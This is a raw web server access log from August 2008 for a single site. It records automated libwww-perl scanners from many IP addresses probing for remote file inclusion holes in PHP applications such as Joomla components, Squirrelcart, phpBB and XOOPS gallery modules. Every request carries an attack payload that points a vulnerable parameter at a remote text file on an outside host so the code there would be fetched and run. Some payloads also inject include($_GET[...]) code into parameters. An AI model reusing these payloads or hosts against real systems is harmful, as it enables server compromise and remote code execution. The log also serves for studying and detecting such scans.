74.52.99.98 - - [20/Aug/2008:05:44:45 -0700] "GET /logs/access.log/?sourcedir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
121.180.11.132 - - [20/Aug/2008:05:44:56 -0700] "GET /logs/access_080812.log//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.benjaminclayton.co.uk//help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:45:28 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://start.ovh.net/~musicfra/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:45:28 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://start.ovh.net/~musicfra/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:45:28 -0700] "GET /logs/access_080814.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://start.ovh.net/~musicfra/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:45:37 -0700] "GET /logs/access_080812.log/modules/My_eGallery/index.php?basepath=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:45:37 -0700] "GET /modules/My_eGallery/index.php?basepath=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:45:38 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:45:47 -0700] "GET /logs/access_080812.log/modules/My_eGallery/index.php?basepath=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:45:47 -0700] "GET /modules/My_eGallery/index.php?basepath=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:45:48 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:45:49 -0700] "GET /logs/access_080810.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://start.ovh.net/~musicfra/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:45:51 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:45:51 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:45:51 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:46:08 -0700] "GET /logs/access_080810.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:46:15 -0700] "GET /logs/access_080730.log//index.php?DOCUMENT_ROOT=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:46:15 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:46:15 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:46:53 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:46:53 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:46:53 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:46:55 -0700] "GET /logs/access_080729.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://start.ovh.net/~musicfra/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:46:55 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://start.ovh.net/~musicfra/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:46:55 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://start.ovh.net/~musicfra/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:46:56 -0700] "GET /logs/access_080808.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://start.ovh.net/~musicfra/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:47:11 -0700] "GET /logs/header.php/step_one.php?server_inc=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:47:11 -0700] "GET /header.php/step_one.php?server_inc=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:47:11 -0700] "GET /logs/access_080810.log/header.php/step_one.php?server_inc=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:47:12 -0700] "GET /logs/header.php/step_one.php?server_inc=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:47:12 -0700] "GET /header.php/step_one.php?server_inc=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:47:12 -0700] "GET /logs/access_080810.log/header.php/step_one.php?server_inc=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
222.122.31.174 - - [20/Aug/2008:05:47:14 -0700] "GET /logs/access_080808.log//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.benjaminclayton.co.uk//help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
222.122.31.174 - - [20/Aug/2008:05:47:15 -0700] "GET /logs//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.benjaminclayton.co.uk//help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
222.122.31.174 - - [20/Aug/2008:05:47:15 -0700] "GET //squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.benjaminclayton.co.uk//help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:47:28 -0700] "GET /logs/access_080730.log//index.php?config=1&base_datapath=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:47:30 -0700] "GET /logs/access_080811.log/header.php/step_one.php?server_inc=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:47:33 -0700] "GET /logs/access_080811.log/header.php/step_one.php?server_inc=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:47:41 -0700] "GET /logs/access_080811.log//index.php?config=1&base_datapath=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:48:45 -0700] "GET /logs/access_080810.log/modules/My_eGallery/index.php?basepath=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
87.226.77.5 - - [20/Aug/2008:05:48:46 -0700] "GET /scanhttp://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
87.226.77.5 - - [20/Aug/2008:05:48:46 -0700] "GET /logs/scanhttp://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
87.226.77.5 - - [20/Aug/2008:05:48:46 -0700] "GET /logs/access_080814.log/scanhttp://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:48:51 -0700] "GET /logs/access_080730.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.226.77.5 - - [20/Aug/2008:05:48:58 -0700] "GET /logs/access.log/scanhttp://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:49:08 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:49:08 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.226.77.5 - - [20/Aug/2008:05:49:13 -0700] "GET /logs/access_080812.log/scanhttp://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:50:06 -0700] "GET /logs/access_080812.log%20/errors.php?error=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:50:08 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:50:08 -0700] "GET /logs/access_080808.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:50:08 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:50:21 -0700] "GET /logs/access_080809.log//?path%5Bdocroot%5D=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:50:45 -0700] "GET /logs/access_080730.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:50:53 -0700] "GET /logs/access_080811.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:51:06 -0700] "GET /logs/access_080811.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:51:06 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:51:06 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:51:09 -0700] "GET /logs/access_080810.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.226.77.5 - - [20/Aug/2008:05:51:47 -0700] "GET /errors.php?error=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
87.226.77.5 - - [20/Aug/2008:05:51:47 -0700] "GET /logs/errors.php?error=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
87.226.77.5 - - [20/Aug/2008:05:51:47 -0700] "GET /logs/access_080807.log/errors.php?error=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
87.226.77.5 - - [20/Aug/2008:05:51:47 -0700] "GET /logs/access.log/errors.php?error=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "americanboyschoir.com"
87.226.77.5 - - [20/Aug/2008:05:51:47 -0700] "GET /errors.php?error=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "americanboyschoir.com"
87.226.77.5 - - [20/Aug/2008:05:51:47 -0700] "GET /logs/errors.php?error=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:52:08 -0700] "GET /logs/access_080810.log/modules/My_eGallery/index.php?basepath=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:52:16 -0700] "GET /logs/access_080811.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:52:16 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:52:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:52:18 -0700] "GET /logs/access_080810.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
190.83.18.253 - - [20/Aug/2008:05:52:53 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
190.83.18.253 - - [20/Aug/2008:05:53:01 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
190.83.18.253 - - [20/Aug/2008:05:53:08 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
218.38.54.160 - - [20/Aug/2008:05:53:10 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.38.54.160 - - [20/Aug/2008:05:53:10 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.38.54.160 - - [20/Aug/2008:05:53:11 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
118.129.166.13 - - [20/Aug/2008:05:53:44 -0700] "GET /logs/access_080729.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
118.129.166.13 - - [20/Aug/2008:05:53:45 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
118.129.166.13 - - [20/Aug/2008:05:53:45 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:53:51 -0700] "GET /logs/access_080809.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
87.226.77.5 - - [20/Aug/2008:05:54:01 -0700] "GET /logs/access_080806.log/errors.php?error=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
74.54.21.66 - - [20/Aug/2008:05:54:38 -0700] "GET /logs/access_080811.log/?path[Bdocroot]=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
74.54.21.66 - - [20/Aug/2008:05:54:39 -0700] "GET /logs/access_080811.log/?path[docroot]=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
74.54.21.66 - - [20/Aug/2008:05:54:39 -0700] "GET /?path[Bdocroot]=http://warsector.ru/access2006.log??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
74.54.21.66 - - [20/Aug/2008:05:54:39 -0700] "GET /?path[docroot]=http://warsector.ru/access2006.log??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
74.54.21.66 - - [20/Aug/2008:05:54:39 -0700] "GET /logs/?path[Bdocroot]=http://warsector.ru/access2006.log??? HTTP/1.1" 200 1653 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
74.54.21.66 - - [20/Aug/2008:05:54:39 -0700] "GET /logs/?path[docroot]=http://warsector.ru/access2006.log??? HTTP/1.1" 200 1653 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.38.54.160 - - [20/Aug/2008:05:54:39 -0700] "GET /logs/access_080729.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.38.54.160 - - [20/Aug/2008:05:54:40 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.38.54.160 - - [20/Aug/2008:05:54:40 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
194.79.66.105 - - [20/Aug/2008:05:55:30 -0700] "GET /logs/access_080814.log/?path[docroot]=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
194.79.66.105 - - [20/Aug/2008:05:55:30 -0700] "GET /?path[docroot]=http://warsector.ru/access2006.log??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
194.79.66.105 - - [20/Aug/2008:05:55:31 -0700] "GET /logs/?path[docroot]=http://warsector.ru/access2006.log??? HTTP/1.1" 200 1653 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:55:35 -0700] "GET /logs/access.log//poll/png.php?include_path=http://injek.by.ru/download/source/klr-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:55:35 -0700] "GET //poll/png.php?include_path=http://injek.by.ru/download/source/klr-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
118.129.166.13 - - [20/Aug/2008:05:55:47 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
118.129.166.13 - - [20/Aug/2008:05:55:52 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
118.129.166.13 - - [20/Aug/2008:05:55:58 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:02 -0700] "GET /logs/access_080729.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:03 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:03 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:03 -0700] "GET /logs/access_080729.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:03 -0700] "GET /logs/access_080729.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:03 -0700] "GET /logs/access_080729.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:04 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:04 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:04 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:04 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:56:04 -0700] "GET /logs/access_080729.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
